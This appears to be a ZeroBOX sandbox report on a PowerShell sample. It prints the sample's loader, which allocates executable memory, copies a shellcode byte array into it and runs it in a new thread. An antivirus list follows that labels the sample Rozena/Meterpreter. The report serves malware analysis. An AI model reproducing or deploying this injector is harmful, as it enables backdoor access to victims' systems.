popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
$XbessADgMdBR = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
$EjtoggkQoPufE = Add-Type -memberDefinition $XbessADgMdBR -Name "Win32" -namespace Win32Functions -passthru
[Byte[]] $qJiSqOwLYsN = 0xba,0xf5,0xe0,0xe2,0xb5,0xdd,0xc3,0xd9,0x74,0x24,0xf4,0x5e,0x31,0xc9,0xb1,0x88,0x31,0x56,0x12,0x3,0x56,0x12,0x83,0x33,0xe4,0x0,0x40,0x3,0x5e,0xab,0x17,0x8d,0x7c,0xf3,0xb1,0x5,0x5b,0x8,0x1f,0xd6,0x6a,0x41,0x21,0x29,0x2b,0xb1,0x21,0xf,0xa0,0x36,0xcb,0xc8,0x4b,0x71,0x33,0x8b,0xd8,0x44,0xc7,0x66,0x4e,0xd2,0xcb,0xa8,0x67,0x5f,0x9,0x2b,0xde,0xd8,0x4a,0x50,0x62,0xdd,0xdc,0x21,0xd4,0x71,0xbb,0x5,0x59,0xd8,0x7a,0x67,0x71,0x85,0xff,0xe6,0x56,0x9f,0xfc,0x52,0x8e,0x15,0x3e,0x18,0xa5,0x21,0x9e,0x8b,0x39,0x78,0xd8,0x72,0x89,0xba,0xe6,0xac,0x96,0xf7,0xa,0x3c,0xa0,0x2e,0xc7,0x6a,0x2,0x6d,0x92,0x80,0xb9,0x31,0x7b,0x35,0x88,0x57,0xf7,0x81,0x43,0xff,0x62,0x18,0x2,0xd,0xe0,0x7d,0x4,0xaa,0x6f,0x40,0x61,0x76,0xcc,0x6a,0xfc,0xc0,0xee,0xd4,0xb0,0xf,0x85,0xb0,0x8e,0x14,0x50,0x83,0x64,0x14,0x4b,0x59,0xea,0x4c,0xaf,0xfc,0xd1,0x6,0xc2,0x95,0x59,0xf4,0x21,0xaf,0xe2,0xbb,0xdc,0x7,0xe0,0x9c,0xaa,0x57,0xc4,0x8,0x1e,0x23,0xba,0x11,0x95,0xab,0x37,0x79,0x4e,0x3b,0x90,0xef,0xca,0x52,0xbf,0xca,0x2d,0xd1,0x77,0x90,0xf5,0x
$pIXHrvja = $EjtoggkQoPufE::VirtualAlloc(0,[Math]::Max($qJiSqOwLYsN.Length,0x1000),0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($qJiSqOwLYsN,0,$pIXHrvja,$qJiSqOwLYsN.Length)
$EjtoggkQoPufE::CreateThread(0,0,$pIXHrvja,0,0,0)
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Powershell.4!c
tehtris Clean
MicroWorld-eScan Generic.Powershell.Injector.B.F427E818
CTX powershell.trojan.rozena
CAT-QuickHeal PS1.Trojan.48671
Skyhigh PS/MPreter
ALYac Generic.Powershell.Injector.B.F427E818
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-PS.Save.f269422b
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Hacktool.Rexershell
ESET-NOD32 PowerShell/Rozena.AH
TrendMicro-HouseCall Clean
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.PowerShell.Generic
BitDefender Generic.Powershell.Injector.B.F427E818
NANO-Antivirus Clean
ViRobot Clean
Sophos ATK/Venom-A
F-Secure Trojan.TR/PShell.Agent.PRC
DrWeb PowerShell.Shellcode.24
VIPRE Generic.Powershell.Injector.B.F427E818
TrendMicro Clean
CMC Clean
Emsisoft Generic.Powershell.Injector.B.F427E818 (B)
huorong Backdoor/Meterpreter.as
FireEye Generic.Powershell.Injector.B.F427E818
Jiangmin Clean
Varist PSH/Rozena.B.gen!Camelot
Avira TR/PShell.Agent.PRC
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.Powershell.Injector.B.F427E818
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Generic
Microsoft Trojan:PowerShell/Rozena.HNAB!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
TACHYON Clean
Zoner Clean
Tencent Win32.Trojan.Generic.Gkjl
Yandex Clean
Ikarus Trojan.PowerShell.Rozena
MaxSecure Clean
Fortinet Clean
Panda Clean
alibabacloud Trojan:Win/Rozena.AJ
No IRMA results available.